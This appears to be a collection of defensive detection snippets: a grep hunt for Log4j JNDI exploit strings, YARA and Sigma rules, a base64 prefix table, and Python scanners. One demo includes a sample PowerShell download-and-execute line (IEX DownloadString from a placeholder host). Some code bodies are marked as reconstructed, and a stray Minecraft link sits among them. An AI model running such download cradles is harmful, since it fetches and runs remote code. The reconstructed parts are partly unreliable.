References: https://twitter.com/cyb3rops/status/1499514240008437762 https://twitter.com/GossiTheDog/status/1499781976835993600
More background: https://twitter.com/FuzzySec/status/1499462430275084307
You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders (-r recurses, -I skips binary files, -i matches case-insensitively). Rotated .gz logs are not inspected, and payloads that are fully URL-encoded or use nested lookups such as ${${lower:j}ndi:...} do not match this pattern, so a clean result is not proof of absence:

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

Guide by Florian Roth
https://www.minecraft.net/en-us/store/minecraft-java-edition/
I've transformed this gist into a git repository.
Whenever you research a certain vulnerability, ask yourself these questions and please answer them for us:
Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)
```python
import hashlib
import re

def calculate_rule_hash(rule):
    """
    Calculates a hash over the relevant YARA rule content (string contents, sorted condition)
    Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara
    :param rule: yara rule object
    :return hash: generated hash
    """
    # Body reconstructed from the docstring; md5 and the exact normalisation are assumptions.
    parts = []
    for s in rule.get('strings', []):
        # hex strings: keep only hex digits / wildcards so spacing and braces do not change the hash
        parts.append(re.sub(r'[^a-fA-F0-9?]', '', s['value']) if s['type'] == 'byte' else s['value'])
    parts.extend(rule.get('condition_terms', []))   # plyara tokenises the condition into terms
    return hashlib.md5("".join(sorted(parts)).encode("utf-8")).hexdigest()
```
```python
import itertools

s = "cmd.exe"
# Every upper/lower case spelling of s (the '.' has no case, so those pairs are identical)
variants = list(map(''.join, itertools.product(*zip(s.upper(), s.lower()))))
```
```yara
rule SUSP_Netscaler_Forensic_Artefacts {
   meta:
      description = "Detects strings / forensic artefacts on exploited Netscaler systems"
      author = "Florian Roth"
      reference = "https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/"
      date = "2020-01-14"
      score = 70
   strings:
      $ = "shell_command=\"whoami\"" ascii
   condition:
      1 of them   // the condition is not on the page; minimal condition assumed so the rule compiles
}
```
```yaml
# ################################################################################
# IMPORTANT NOTE
# The most recent version of this POC rule can now be found in the main repository
# https://github.com/Neo23x0/sigma/blob/master/other/godmode_sigma_rule.yml
# ################################################################################
```
| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
| JAB | Jabber | $. | Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
| TVq | Television | MZ | MZ header |
| SUVY | SUV | IEX | PowerShell Invoke Expression |
| SQBFAF | Squab favorite | I.E. | PowerShell Invoke Expression (UTF-16) |
| SQBuAH | Squab uahhh | I.n. | PowerShell Invoke string (UTF-16), e.g. Invoke-Mimikatz |
| PAA | "Pah!" | <. | Often used by Emotet (UTF-16) |

* A dot marks the null byte of the UTF-16 encoding; the prefixes are those of a string that starts at base64 offset 0.
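The table only lists the spelling for a string that begins at the first byte of the base64 buffer; because base64 packs three bytes into four characters, the same string has three encodings depending on its byte offset. The following added example (mine, not from the gist) derives all three prefixes for any string and encoding, and then scans constructed command lines for the table's prefixes at the start of a base64 token. The sample lines and the example.invalid URL are made up.

```python
import base64
import re

# The page's table as a lookup: base64 prefix -> what it decodes to (offset 0 only).
KNOWN_PREFIXES = {
    "JAB": "$. (UTF-16 variable declaration)",
    "TVq": "MZ (PE header)",
    "SUVY": "IEX",
    "SQBFAF": "I.E. (IEX, UTF-16)",
    "SQBuAH": "I.n. (Invoke-*, UTF-16)",
    "PAA": "<. (UTF-16, Emotet)",
}


def stable_b64_prefixes(text, encoding="utf-8"):
    """The three base64 spellings of text, one per alignment of its first byte.

    Offset p means p unknown bytes precede the text in the encoded buffer. Only
    characters whose six bits lie completely inside the text bytes are returned,
    because the others depend on the unknown neighbouring bytes.
    """
    data = text.encode(encoding)
    n = len(data)
    out = []
    for p in range(3):
        enc = base64.b64encode(b"\x00" * p + data).decode("ascii")
        first = (8 * p + 5) // 6          # first character built only from text bits
        last = (8 * (p + n) - 6) // 6     # last character built only from text bits
        out.append(enc[first:last + 1])
    return out


# A base64 token must start here; "TVq" in the middle of an unrelated blob is noise.
_TOKEN_START = r"(?<![A-Za-z0-9+/])"


def scan_for_known_prefixes(lines, prefixes=KNOWN_PREFIXES):
    """Return (1-based line number, prefix, meaning) for each known prefix opening a base64 token."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for prefix, meaning in prefixes.items():
            if re.search(_TOKEN_START + re.escape(prefix), line):
                hits.append((n, prefix, meaning))
    return hits


# Constructed sample command lines (not real telemetry); the encoded command is built
# here so the example is self-consistent.
_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_LINES = [
    "powershell.exe -nop -w hidden -enc " + base64.b64encode(_PS.encode("utf-16-le")).decode(),
    "powershell.exe -c \"" + base64.b64encode(_PS.encode("utf-8")).decode() + "\"",
    "cmd.exe /c echo hello",
]

if __name__ == "__main__":
    print(stable_b64_prefixes("Invoke"))            # the three 'Invoke' spellings
    print(stable_b64_prefixes("IEX", "utf-16-le"))  # starts with the table's SQBFAF
    for hit in scan_for_known_prefixes(SAMPLE_LINES):
        print(hit)
```

stable_b64_prefixes("Invoke") yields SW52b2tl, ludm9rZ and JbnZva2; a detection that only knows the offset-0 form misses two thirds of the placements, which is why the offset-1 and offset-2 variants belong in the rule as well.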
```yaml
title: Suspicious Keyboard Layout Load
description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
references:
    - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index
author: Florian Roth
date: 2019/10/12
logsource:
    product: windows
    service: sysmon
    definition: 'Requirements: Sysmon config that monitors the \Keyboard Layout\Preload subkey of the HKCU/HKU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'
```
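The detection section of the rule is not on this page. As an added example (mine, not the gist's), here is the check such a rule performs, run over constructed Sysmon EventID 13 (RegistryEvent: value set) records: a write under \Keyboard Layout\Preload whose value's low four hex digits are a language ID from a watch list. The watch list (0804 Chinese PRC, 0429 Persian, 042A Vietnamese) and the event field names are assumptions for the demonstration; extend the list for your own estate.

```python
import re

# Windows language IDs (low 16 bits of a keyboard layout ID) treated as suspicious on a
# US-only estate. IME layouts carry a non-zero high word (e.g. d0010804 for a Chinese IME),
# so only the last four hex digits are compared. List assumed for this example.
SUSPICIOUS_LANG_IDS = {
    "0804": "Chinese (Simplified, PRC)",
    "0429": "Persian (Iran)",
    "042a": "Vietnamese",
}

# Preload values are numbered subvalues under the per-user hive's Keyboard Layout key.
_PRELOAD_KEY = re.compile(r"\\Keyboard Layout\\Preload\\\d+$", re.I)


def suspicious_layout_loads(events, lang_ids=SUSPICIOUS_LANG_IDS):
    """Filter Sysmon EventID 13 records for suspicious keyboard preloads.

    Each event is a dict using Sysmon's field names; returns (user, layout id, language).
    """
    hits = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        if not _PRELOAD_KEY.search(ev.get("TargetObject", "")):
            continue
        details = ev.get("Details", "").strip().lower()   # e.g. "00000804" or "d0010804"
        if not re.fullmatch(r"[0-9a-f]{8}", details):
            continue
        lang = lang_ids.get(details[-4:])
        if lang:
            hits.append((ev.get("User", "?"), details, lang))
    return hits


# Constructed Sysmon records (not real telemetry): a US layout, a Chinese IME layout,
# a Vietnamese layout and an unrelated registry write.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "CORP\\alice", "Details": "00000409",
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\Keyboard Layout\\Preload\\1"},
    {"EventID": 13, "User": "CORP\\bob", "Details": "d0010804",
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1002\\Keyboard Layout\\Preload\\2"},
    {"EventID": 13, "User": "CORP\\carol", "Details": "0000042A",
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1003\\Keyboard Layout\\Preload\\1"},
    {"EventID": 13, "User": "CORP\\dave", "Details": "1",
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1004\\Software\\Policies\\Example"},
]

if __name__ == "__main__":
    for user, layout, lang in suspicious_layout_loads(SAMPLE_EVENTS):
        print(f"{user}: preloaded layout {layout} ({lang})")
```

The US layout (0409) and the unrelated key are ignored; bob's IME entry is caught even though its high word is not zero, which a naive string match on "00000804" would miss.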